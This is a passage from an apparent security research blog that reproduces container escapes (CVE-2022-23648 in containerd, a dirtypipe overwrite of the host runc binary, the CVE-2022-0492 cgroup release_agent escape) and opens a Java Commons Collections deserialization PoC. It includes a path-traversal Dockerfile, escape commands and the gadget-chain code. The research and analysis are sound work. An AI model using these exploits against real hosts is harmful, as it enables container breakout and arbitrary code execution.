./sbr
./loopback
./dhcp
./ptp
./ipvlan
./bandwidth
root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
{
"cniVersion": "0.2.0",
"name": "mynet",
"type": "bridge",
"bridge": "cni0",
"isGateway": true,
"ipMasq": true,
"ipam": {
"type": "host-local",
"subnet": "10.22.0.0/16",
"routes": [
{ "dst": "0.0.0.0/0" }
]
}
}
root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
{
"cniVersion": "0.2.0",
"name": "lo",
"type": "loopback"
}
</code></pre></div></div>
<h4> Create container and trigger vulnerability </h4>
<ul>
<li>
<p>Pull the pause image</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# crictl pull registry.aliyuncs.com/google_containers/pause:3.6
Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
k8s.gcr.io/pause:3.6
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
</code></pre></div> </div>
</li>
<li>
<p>Create the malicious image</p>
</li>
</ul>
<p>Build it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile
root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /../../../../../../../../etc/ssh
---> Running in 06720320c1f6
Removing intermediate container 06720320c1f6
---> b253bcd6793c
Successfully built b253bcd6793c
Successfully tagged cve-2022-23648:latest
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
VOLUME /../../../../../../../../etc/ssh
root@ubuntu:/home/test/CVE-2022-23648#
</code></pre></div></div>
<ul>
<li>
<p>Import it in containerd</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import cve-2022-23648.tar
unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
root@ubuntu:/home/test/CVE-2022-23648# crictl image
IMAGE TAG IMAGE ID SIZE
docker.io/library/cve-2022-23648 latest b253bcd6793c2 75.1MB
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
</code></pre></div> </div>
</li>
<li>
<p>Run the malicious image</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
3bf95742d0fb3 10 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
ba2d0c46c5502 docker.io/library/cve-2022-23648:latest 14 seconds ago Running test 0 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
root@ubuntu:/# ls /etc/ssh/
root@ubuntu:/# ls /etc/ssh
</code></pre></div> </div>
</li>
</ul>
<p>Emmm, no host data. What’s wrong? From this <a href="https://ubuntu.com/security/CVE-2022-23648">page</a>, we can see that my containerd is already fixed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# containerd --version
containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2
root@ubuntu:/home/test# which containerd
/usr/bin/containerd
root@ubuntu:/home/test# stat /usr/bin/containerd
File: /usr/bin/containerd
Size: 60305392 Blocks: 117784 IO Block: 4096 regular file
Device: 805h/2053d Inode: 5769129 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2022-03-25 23:43:13.235999616 -0700
Modify: 2022-02-25 12:15:25.000000000 -0800
Change: 2022-03-14 06:37:43.871583849 -0700
Birth: -
</code></pre></div></div>
<ul>
<li>
<p>Install an older, unpatched version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
Stopped sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
Removed sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
1ecc6bee60024 4 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
fe4ef77ab8e31 docker.io/library/cve-2022-23648:latest 7 seconds ago Running test 0 1ecc6bee60024
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
root@ubuntu:/# ls /etc/ssh
host_file ssh_config ssh_config.d
root@ubuntu:/# cat /etc/ssh/host_file
host
root@ubuntu:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# containerd --version
containerd github.com/containerd/containerd 1.3.3-0ubuntu2
</code></pre></div> </div>
</li>
</ul>
<p>Finally we have reproduced this vulnerability.</p>
<h3> The end </h3>
<p>After reproducing this vulnerability, I wanted to know why docker and ctr couldn’t trigger it, and discussed this a lot with Fu wei. Here are the conclusions I drew (not sure whether they are 100% accurate):</p>
<p>CRI is the interface between Kubernetes and the container runtime, while OCI specifies how to run a container. So some software is needed between CRI and OCI: it implements the CRI interface towards Kubernetes, converts CRI requests into the low-level OCI spec, and launches containers. containerd and cri-o are this kind of software. Kubernetes can also use docker to run containers, but it needs the docker-shim to interact with docker through the CRI interface.</p>
<ul>
<li>containerd. containerd is a container runtime used to manage containers. It exposes not only the CRI interface but also other container-management interfaces.</li>
<li>ctr. ctr is containerd’s client test tool; it is not related to CRI at all.</li>
<li>crictl. crictl is a CLI for CRI-compatible container runtimes. It interacts with a CRI runtime to manage containers.</li>
<li>docker. docker is not related to CRI either; it is just another container-management tool.</li>
</ul>
<p>As the vulnerability lives in containerd’s CRI plugin, it can only be triggered along the CRI path. In this post I used crictl to trigger it; it can also be triggered in a Kubernetes cluster that uses containerd as its CRI runtime.</p>
<h3> reference </h3>
<p><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2244">containerd: Insecure handling of image volumes</a></p>
<p><a href="https://www.yinnote.com/containerd/">使用containerd单独创建容器</a></p>
Container escape using dirtypipe2022-03-19T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/19/container-escape-through-dirtypipe
<h3> Background </h3>
<p>The story begins with the pictures that Yuval Avrahami shows in <a href="https://twitter.com/yuvalavra/status/1500978532494843912/photo/1">twitter</a>. Here it is:</p>
<p><img src="/assets/img/containerescapedirtypipe/1.jpg" alt="" /></p>
<p>It means we can overwrite host files in the /bin directory using dirtypipe, even though dirtypipe actually only modifies the file’s page cache.</p>
<p>Then a security researcher at Moresec also wrote a <a href="https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2OnUA">post</a> showing that dirtypipe can be used for container escape.
Other researchers such as <a href="https://twitter.com/drivertomtt/status/1504504067975909376">drivertom</a> also pulled this off.</p>
<p>On busy working days I had no time for more experiments, so I just discussed the point with some friends. At first glance it seems dirtypipe can’t be used for
container escape. It is easy to see that dirtypipe can change files in other containers, since containers may share some layer files. But as far as I know,
‘/proc/self/exe’ is the only file through which a container interacts with the host filesystem, and after CVE-2019-5736 the runc binary is cloned into memory with memfd_create, so
it seems we can only overwrite the cloned binary, not the actual runc binary in the host filesystem.</p>
<p>So how did these guys achieve container escape using dirtypipe? Bonan, another excellent cloud-native security researcher, suggested that perhaps the memfd_create file is copy-on-write.
The cloned binary and the host runc binary might then share the same physical pages, so when dirtypipe modifies the clone’s page cache it also affects the host runc binary. This is quite plausible.
I became more convinced that ‘the cloned and host runc binary share the same physical page’ was the reason after digging into the internals of the ‘memfd_create’ and ‘sendfile’ syscalls.</p>
<h3> Experiment </h3>
<p>If our guess is right, we can stop the escape by replacing sendfile with a plain read-and-write copy into the memfd_create file, so that it no longer shares physical pages with the host runc binary.
Anyway, this is just a guess; we need to prove it. First let’s try to escape and overwrite the runc binary from the container.</p>
<p>This is easy to achieve by combining the widely available CVE-2019-5736 PoC with the dirtypipe PoC. After getting the read-only runc binary fd, we can use dirtypipe to overwrite it.</p>
<p>Before the escape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# mv runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
70df137b272bd8fb1e3e63e90d77943a /usr/sbin/runc
</code></pre></div></div>
<p>After the escape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
687765833647de6091b82896fe90844a /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# head -c 20 /usr/sbin/runc
ELdirtypipe>root@ubuntu:/home/test/go/src/runc# runc --version
bash: /usr/sbin/runc: cannot execute binary file: Exec format error
</code></pre></div></div>
<p>As we can see, the host binary is modified, so container escape using dirtypipe works.
Now let’s do the second experiment: don’t use sendfile, but a plain read-and-write copy (a deep copy). Fortunately the runc code already has both methods,
so we can easily test this by commenting out the sendfile call. The patch is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> --- a/libcontainer/nsenter/cloned_binary.c
+++ b/libcontainer/nsenter/cloned_binary.c
@@ -507,13 +507,14 @@ static int clone_binary(void)
goto error_binfd;
while (sent < statbuf.st_size) {
- int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
- if (n < 0) {
+ //int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
+ int n = 0;
+ //if (n < 0) {
/* sendfile can fail so we fallback to a dumb user-space copy. */
n = fd_to_fd(execfd, binfd);
if (n < 0)
goto error_binfd;
- }
+ //}
sent += n;
</code></pre></div></div>
<p>After compiling the new runc, the output is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
8a5acd21ac5099abf40c15c815c97de1 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
ece16f4f8aa1518d95a19e9c5b2cb66b /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
bash: /usr/sbin/runc: cannot execute binary file: Exec format error
</code></pre></div></div>
<p>Emmm, interesting: the runc binary is still modified. We need to go into the runc code to find the truth. After a moment, a suspicious function
appears. clone_binary calls ‘try_bindfd’ to get an execfd; if ‘try_bindfd’ succeeds, neither ‘sendfile’ nor ‘fd_to_fd’ is ever executed.
The comment is quite clear: copying happens only when ‘try_bindfd’ fails.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int clone_binary(void)
{
int binfd, execfd;
struct stat statbuf = { };
size_t sent = 0;
int fdtype = EFD_NONE;
/*
* Before we resort to copying, let's try creating an ro-binfd in one shot
* by getting a handle for a read-only bind-mount of the execfd.
*/
execfd = try_bindfd();
if (execfd >= 0)
return execfd;
...
}
</code></pre></div></div>
<p>Let’s comment out the call to ‘try_bindfd’. Note: this time we comment out both ‘try_bindfd’ and ‘sendfile’, so runc uses ‘fd_to_fd’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
49f35f333efdfaf628bcd48aee611340 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
49f35f333efdfaf628bcd48aee611340 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
</code></pre></div></div>
<p>OK, as we can see, we can’t modify the runc binary through the deep copy.</p>
<p>Let’s do the final experiment. This time we comment out ‘try_bindfd’ only, so runc uses ‘sendfile’. If our guess is right, the runc binary should again be modified.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
81dd1b92fe8a80a0682b8ac117821790 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
81dd1b92fe8a80a0682b8ac117821790 /usr/sbin/runc
</code></pre></div></div>
<p>Emmm, interesting again: the runc binary hasn’t been modified. Our guess was wrong.
I then modified the dirtypipe PoC from the splice syscall to the sendfile syscall and, as expected, it didn’t work. So the answer is:
the sendfile syscall does not share physical pages between the src file and the dst file.</p>
<h3> Conclusion </h3>
<p>After looking into the source code, I found that the ‘sendfile’ syscall actually does not share physical pages between the src file and the dst file. It works as follows:</p>
<ul>
<li>splice the src file into an internally created pipe; this shares the src file’s page cache with the pipe.</li>
<li>then splice the data from the pipe into the dst file; this does an actual copy, with no sharing.</li>
</ul>
<p>This behaviour also applies to the splice syscall. That is to say, when splicing a file into a pipe the pages are shared, and when splicing from a pipe into a file the data is not shared but actually copied.</p>
<p>So the function responsible for the container escape is ‘try_bindfd’, introduced in <a href="https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628">this commit</a>.
From the commit message we know that after the <a href="https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b">fix</a> for CVE-2019-5736 was introduced, the runc community decided
to use a more efficient method to avoid the vulnerability. It creates a read-only bind-mount of the runc binary, gets a handle to that bind-mount, and finally unmounts it.
This way the runc binary can’t be overwritten through normal writes. With this method, however, /proc/self/exe still points at the runc binary in the host filesystem, so combined with dirtypipe we can write the actual runc binary on the host.</p>
<p>After CVE-2019-5736, most security researchers believed the fix was to use memfd_create to create a file in memory and copy the runc binary into it, but that is wrong.
And since we can do container escape using dirtypipe, we assumed that sendfile shares pages between the src and dst files, but that is also wrong.
These two wrong assumptions fit together and made everything seem explainable, just like a negative times a negative equals a positive.
There is an old Chinese saying: “knowledge from books is always shallow; true understanding comes only from practice” (纸上得来终觉浅,绝知此事要躬行).
The process of exploring container escape using dirtypipe reminded me of this old saying.</p>
<p>Returning to Yuval’s pictures: they show files in the /bin directory being modified. I’m not sure this is how Yuval escaped. If he escaped through /proc/self/exe and the shellcode then modified files in /bin, it would look exactly like the pictures; if not, there may be something else interesting going on.</p>
<h3> reference </h3>
<p><a href="https://dirtypipe.cm4all.com/">The Dirty Pipe Vulnerability</a></p>
<p><a href="https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2OnUA">从DirtyPipe到Docker逃逸</a></p>
CVE-2022-0492: how release_agent escape become a vulnerability 2022-03-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/06/cve-2022-0492
<p>The cgroup release_agent escape was a classical usermode-helper escape several years ago. Recently it got a CVE and became popular again. At first glance I didn’t know why, and had little time to dig into why it got a CVE now. After reading <a href="https://twitter.com/yuvalavra">Yuval Avrahami</a>’s post <a href="https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/">New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape</a> and discussing it with him, I found there is a lot behind CVE-2022-0492, so I decided to write a post.</p>
<h3> CVE-2022-0492 </h3>
<p>In the previous release_agent escape, we needed to add the CAP_SYS_ADMIN capability to the container. CVE-2022-0492 shows that we can instead mount cgroupfs in a new user namespace and then write to the release_agent file. Following is the reproducer.</p>
<p>docker doesn’t give CAP_SYS_ADMIN to the container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# docker run --rm -it --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu bash
root@26604070fc87:/# cat /proc/self/status | grep Cap
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
test@ubuntu:~$ capsh --decode=00000000a80425fb
WARNING: libcap needs an update (cap=40 should have a name).
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
</code></pre></div></div>
<p>Then, in the container, we run unshare to create a new user namespace and cgroup namespace. Now we can mount cgroupfs and write our data to release_agent.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# unshare -UrmC bash
root@26604070fc87:/# cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000
root@26604070fc87:/# mount -t cgroup -o rdma cgroup /mnt
root@26604070fc87:/# ls /mnt
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@26604070fc87:/# echo "test" > /mnt/release_agent
root@26604070fc87:/# cat /mnt/release_agent
test
</code></pre></div></div>
<h3> Why sysfs and procfs can't work </h3>
<p>The PoC is not complex, but there is a lot of detail behind it. The first question is why the same trick can’t work with core_pattern and uevent_helper, which live in procfs and sysfs.
Let’s see whether we can mount sysfs or procfs in the new user namespace.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# mkdir /tmp/procfs
root@26604070fc87:/# mkdir /tmp/sysfs
root@26604070fc87:/# mount -t proc procfs /tmp/procfs
mount: /tmp/procfs: permission denied.
root@26604070fc87:/# mount -t sysfs sysfs /tmp/sysfs
mount: /tmp/sysfs: permission denied.
</code></pre></div></div>
<p>As we can see, we can’t mount it.</p>
<p>The mount syscall path is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE5(mount)
-->do_mount
-->do_new_mount
-->mount_capable
-->vfs_get_tree
-->do_new_mount_fc
-->mount_too_revealing
-->vfs_create_mount
-->do_add_mount
</code></pre></div></div>
<p>The first permission check is in ‘mount_capable’. Notice that the user ns passed to ‘ns_capable’ is the fs_context’s user ns.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool mount_capable(struct fs_context *fc)
{
if (!(fc->fs_type->fs_flags & FS_USERNS_MOUNT))
return capable(CAP_SYS_ADMIN);
else
return ns_capable(fc->user_ns, CAP_SYS_ADMIN);
}
</code></pre></div></div>
<p>‘fc->user_ns’ is set in the ‘init_fs_context’ callback of ‘struct file_system_type’. In the cgroupfs case, since we unshare the user namespace and cgroup namespace together, ‘fc->user_ns’ is the
new user namespace, in which we have CAP_SYS_ADMIN, so the ‘mount_capable’ check passes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int cgroup_init_fs_context(struct fs_context *fc)
{
struct cgroup_fs_context *ctx;
ctx = kzalloc(sizeof(struct cgroup_fs_context), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
ctx->ns = current->nsproxy->cgroup_ns;
...
fc->user_ns = get_user_ns(ctx->ns->user_ns);
fc->global = true;
return 0;
}
</code></pre></div></div>
<p>In the procfs case, ‘proc_init_fs_context’ sets fc->user_ns to the pid namespace’s user ns.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_init_fs_context(struct fs_context *fc)
{
struct proc_fs_context *ctx;
ctx = kzalloc(sizeof(struct proc_fs_context), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
ctx->pid_ns = get_pid_ns(task_active_pid_ns(current));
put_user_ns(fc->user_ns);
fc->user_ns = get_user_ns(ctx->pid_ns->user_ns);
fc->fs_private = ctx;
fc->ops = &proc_fs_context_ops;
return 0;
}
</code></pre></div></div>
<p>As we didn’t create a new pid ns, fc->user_ns is the init user ns. The container has no CAP_SYS_ADMIN in that user namespace, so it fails the ‘mount_capable’ check.</p>
<h3> Why 'unshare -UrmC -pf bash' can't work </h3>
<p>So what if we also unshare the pid namespace?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@26604070fc87:/# mount -t proc procfs /mnt
mount: /mnt: permission denied.
</code></pre></div></div>
<p>We still can’t mount procfs in the new user namespace and pid namespace. This time we pass the ‘mount_capable’ check, but we run into mount’s second permission check.</p>
<p>The second permission check is in ‘mount_too_revealing’. This function is interesting.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool mount_too_revealing(const struct super_block *sb, int *new_mnt_flags)
{
const unsigned long required_iflags = SB_I_NOEXEC | SB_I_NODEV;
struct mnt_namespace *ns = current->nsproxy->mnt_ns;
unsigned long s_iflags;
if (ns->user_ns == &init_user_ns)
return false;
/* Can this filesystem be too revealing? */
s_iflags = sb->s_iflags;
if (!(s_iflags & SB_I_USERNS_VISIBLE))
return false;
if ((s_iflags & required_iflags) != required_iflags) {
WARN_ONCE(1, "Expected s_iflags to contain 0x%lx\n",
required_iflags);
return true;
}
return !mnt_already_visible(ns, sb, new_mnt_flags);
}
</code></pre></div></div>
<p>‘mount_too_revealing’ only matters in a new user namespace; as we can see, it returns ‘false’ when called in the init_user_ns. The name hints at the meaning: if the mount operation
would reveal too much data, the kernel should deny it. The first interesting part is ‘SB_I_USERNS_VISIBLE’: if the super_block doesn’t set this flag, the mount simply bypasses the reveal check. The only two filesystems that set it
are sysfs and procfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (!(s_iflags & SB_I_USERNS_VISIBLE))
return false;
</code></pre></div></div>
<p>For example, procfs sets it in ‘proc_fill_super’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_fill_super(struct super_block *s, struct fs_context *fc)
{
s->s_iflags |= SB_I_USERNS_VISIBLE | SB_I_NOEXEC | SB_I_NODEV;
}
</code></pre></div></div>
<p>So cgroupfs passes the ‘mount_too_revealing’ check, while procfs and sysfs go on to ‘mnt_already_visible’, which they can’t pass.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool mnt_already_visible(struct mnt_namespace *ns,
const struct super_block *sb,
int *new_mnt_flags)
{
int new_flags = *new_mnt_flags;
struct mount *mnt;
bool visible = false;
down_read(&namespace_sem);
lock_ns_list(ns);
list_for_each_entry(mnt, &ns->list, mnt_list) {
struct mount *child;
int mnt_flags;
...
list_for_each_entry(child, &mnt->mnt_mounts, mnt_child) {
struct inode *inode = child->mnt_mountpoint->d_inode;
/* Only worry about locked mounts */
if (!(child->mnt.mnt_flags & MNT_LOCKED))
continue;
/* Is the directory permanetly empty? */
if (!is_empty_dir_inode(inode))
goto next;
}
/* Preserve the locked attributes */
*new_mnt_flags |= mnt_flags & (MNT_LOCK_READONLY | \
MNT_LOCK_ATIME);
visible = true;
goto found;
next: ;
}
found:
unlock_ns_list(ns);
up_read(&namespace_sem);
return visible;
}
</code></pre></div></div>
<p>‘mnt_already_visible’ iterates over the mounts in the current mount namespace and checks whether the existing procfs mount has locked child mountpoints. If it does, the filesystem is not fully visible in this mount namespace, so a fresh procfs can’t be mounted.
The reason is as follows. procfs and sysfs contain global data that the container should not touch, so mounting them in a new user namespace must be restricted: if it were allowed,
we could mount the whole, unmasked procfs in the new user namespace. In a docker/runc environment there are ‘maskedPaths’, paths that must be masked inside the container. For example, runc’s default
maskedPaths are as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "maskedPaths": [
"/proc/acpi",
"/proc/asound",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/sys/firmware",
"/proc/scsi"
],
</code></pre></div></div>
<p>As we can see, some proc and sys files are masked in the container, which means the container does not have a full view of procfs and sysfs. ‘maskedPaths’ is implemented by mounting these paths over with ‘/dev/null’, so the procfs mount has child mountpoints. As I didn’t want to figure out how to change docker’s maskedPaths, let’s use runc for the test. We’ll use sysfs, since that only requires deleting one line.</p>
<p>First we need to remove the rootfs readonly setting from runc’s default config.json:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "readonly": true
</code></pre></div></div>
<p>sysfs uses the network namespace’s user namespace, so we need ‘unshare -Urmn sh’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/mycontainer# runc run test
/ # unshare -Urmn sh
/ # mkdir /mnt
/ # mount -t sysfs -o ro sysfs /mnt
mount: permission denied (are you root?)
</code></pre></div></div>
<p>Next we delete ‘/sys/firmware’ from maskedPaths in config.json. Now we can mount sysfs successfully.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/mycontainer# runc run test
/ # unshare -Urmn sh
/ # mount -t sysfs -o ro sysfs /mnt
/ # ls /mnt
block class devices fs kernel power
bus dev firmware hypervisor module
</code></pre></div></div>
<p>I did this test successfully on 5.4.1 but it failed on 5.11; maybe there are more protections now. We use ‘ro’ here because runc mounts sysfs read-only in the container.</p>
<h3> Summary </h3>
<p>Just as Yuval Avrahami pointed out, CVE-2022-0492 is about creating a new user &amp; cgroup namespace and then doing the release_agent escape. The kernel security mechanisms behind this CVE are quite interesting.</p>
<h3> Reference </h3>
<p>I mostly read Yuval Avrahami’s post, and thank him for pointing out the key to understanding CVE-2022-0492.</p>
<p><a href="https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/">New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?</a>
<a href="https://github.com/opencontainers/runc/issues/1658">Rootless containers don’t work from unprivileged non-root Docker container (operation not permitted for mounting procfs)</a></p>
A Primer on Java Deserialization Vulnerabilities: Transformer, Dynamic Proxies, and Annotations2022-01-30T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/01/30/java-dynamic-proxy-and-annotation
<p>This year I set myself the goal of thoroughly understanding Java deserialization vulnerabilities. The principle behind them is not complicated in itself, but none of the material I found online was satisfying: most of it only shows how to run someone else's PoC without analyzing the underlying mechanism in depth. The analyses of the Commons Collections chains are especially disappointing — for example, why does deserialization need a class with its own readObject, and why does AnnotationInvocationHandler's first argument work with both Override.class and Target.class? So I decided to analyze each building block myself. The focus is dynamic proxies and annotations, but for completeness the first part covers Transformer.</p>
<h3> PoC </h3>
<p>First, here is the most basic Commons Collections PoC. Running the following code pops up the calculator directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public static void main(String[] args) throws Exception {
Transformer[] transformers = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
Transformer chain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
innerMap.put("value","test");
Map outerMap = TransformedMap.decorate(innerMap, null, chain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Retention.class ,outerMap);
// serialize
FileOutputStream fos = new FileOutputStream("cc1");
